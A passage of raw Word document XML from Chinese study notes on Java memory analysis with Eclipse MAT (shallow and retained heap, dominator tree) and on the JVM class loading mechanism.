      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>通过柱状图</w:t>
      </w:r>
      <w:r w:rsidR="00231E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(Histogram)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>界面，可以查找引用选中对象的对象集合以及选中对象所引用的对象结合。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007271C1" w:rsidRPr="00DB3B95">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="007271C1" w:rsidRPr="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ith outgoing references</w:t>
      </w:r>
      <w:r w:rsidR="007271C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="007271C1" w:rsidRPr="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ith incoming references</w:t>
      </w:r>
      <w:r w:rsidR="007271C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>命令分别表示查找</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>byte[]</w:t>
      </w:r>
      <w:r w:rsidR="00941EF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>实例的引用对象，以及引用</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>byte[]</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>实例的对象，通过</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>MAT</w:t>
      </w:r>
      <w:r w:rsidR="00DB3B95">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>可以根据对象间的引用关系，对内存中的对象进行分析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>为了方便查看，柱状图还提供了根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>和包对类进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、浅堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(Shallow)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>和深堆</w:t>
      </w:r>
      <w:r w:rsidR="003D2D3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(Retained)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006F4302">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>浅堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>表示一个对象结构所占用内存的大小。</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4302">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>深堆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>表示一个对象被回收后，可以真实释放的内存大小。</w:t>
      </w:r>
      <w:r w:rsidR="00FE28F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>一个对象的深堆指只能通过该对象访问到的</w:t>
      </w:r>
      <w:r w:rsidR="00FE28F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FE28F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>直接或间接</w:t>
      </w:r>
      <w:r w:rsidR="00FE28F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FE28F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>所有对象的浅堆之和，即对象被回收后，可以释放的真实空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D3E9D" w:rsidRDefault="006D3E9D" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、支配树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(Dominator Tree)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E019F" w:rsidRDefault="00AD219A" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>支配树体现了对象实例间的支配关系，它是基于对象间的引用图所建立的，它有以下基本性质：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD219A" w:rsidRPr="00AD219A" w:rsidRDefault="00AD219A" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、垃圾回收根</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>(gc roots)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E019F" w:rsidRDefault="009E019F" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F4302" w:rsidRPr="00301FC8" w:rsidRDefault="006F4302" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000B1F23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidR="000B1F23" w:rsidRPr="000B1F23">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>http://itindex.net/detail/52428-mat-memory-analyzer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073188A" w:rsidRPr="00F41A4C" w:rsidRDefault="0073188A" w:rsidP="0073188A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.7  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514C45" w:rsidRPr="008232D6" w:rsidRDefault="00514C45" w:rsidP="008232D6">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>类加载机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00276F80" w:rsidRDefault="00276F80" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00276F80">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.ibm.com/developerworks/cn/java/j-lo-classloader/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8514C" w:rsidRPr="00F41A4C" w:rsidRDefault="00CB2D46" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载机制的</w:t>
      </w:r>
      <w:r w:rsidR="00C8514C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>研究目的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8514C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C8514C" w:rsidP="00EE7973">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>研究类的加载有助于了解</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行过程</w:t>
      </w:r>
      <w:r w:rsidR="00F24D31" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8514C" w:rsidRPr="00F41A4C" w:rsidRDefault="00C8514C" w:rsidP="00EE7973">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>让程序能动态的控制类加载，比如热部署等，提高程序的灵活性和适应性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00CB2D46">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的所有类，都需要由类加载器装载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中才能运行。类加载器本身也是一个类，而它的工作就是把</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件从硬盘读取到内存中。在写程序的时候，我们几乎不需要关心类的加载，因为这些都是隐式装载的，除非我们有特殊的用法，像是反射，就需要显式的加载所需要的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00F24D31">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java类的加载是动态的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，它并不会一次性将所有类全部加载后再运行，而是保证程序运行的基础类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>像是基类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完全加载到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，至于其他类，则在需要的时候才加载。这当然就是为了节省内存开销。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00F24D31">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的类加载器有三个，对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的三种类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F24D31" w:rsidRPr="00A3303D" w:rsidRDefault="00F24D31" w:rsidP="00670C4F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="269" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Bootstrap Loader // </w:t>
      </w:r>
      <w:r w:rsidR="001D03B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引导类加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责加载系统类</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指的是内置类，像是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，对应于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3303D">
        <w:rPr>
